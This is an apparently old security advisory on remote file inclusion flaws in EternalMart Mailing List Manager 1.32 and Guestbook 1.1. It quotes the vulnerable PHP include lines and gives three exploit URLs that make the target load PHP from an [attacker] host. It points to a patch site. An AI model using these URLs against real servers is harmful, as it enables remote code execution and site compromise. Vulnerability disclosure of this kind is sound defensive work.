|
Informations : °°°°°°°°°°°°° Language : PHP ------------------------------------------------- Produit : EMML (EternalMart Mailing List Manager) Version : 1.32 ------------------------------------------------- Produit : EMGB (EternalMart Guestbook) Version : 1.1 ------------------------------------------------- Website : http://www.eternalmart.com Problem : Include Files PHP Code/Location : °°°°°°°°°°°°°°°°°°° EMML : email_email_func.php : -------------------------------------------------- include("$emml_path/class.html.mime.mail.php"); -------------------------------------------------- /admin/auth.php : -------------------------------------------- include("$emml_admin_path/auth_func.php"); -------------------------------------------- EMGB : /admin/auth.php : -------------------------------------------- include("$emgb_admin_path/auth_func.php"); -------------------------------------------- Exploits : °°°°°°°° EMML : - http://[target]/admin/auth.php?emml_admin_path=http://[attacker] will include the file : http://[attacker]/auth_func.php - http://[target]/emml_email_func.php?emml_path=http://[attacker] will include the file : http://[attacker]/class.html.mime.mail.php EMGB : - http://[target]/admin/auth.php?emgb_admin_path=http://[attacker] will include the file : http://[attacker]/auth_func.php More Details/Solution : °°°°°°°°°°°°°°°°°°°°° A patch and more details can be found on http://www.phpsecure.info . frog-m@n _________________________________________________________________ Hotmail: votre e-mail gratuit ! http://www.fr.msn.be/hotmail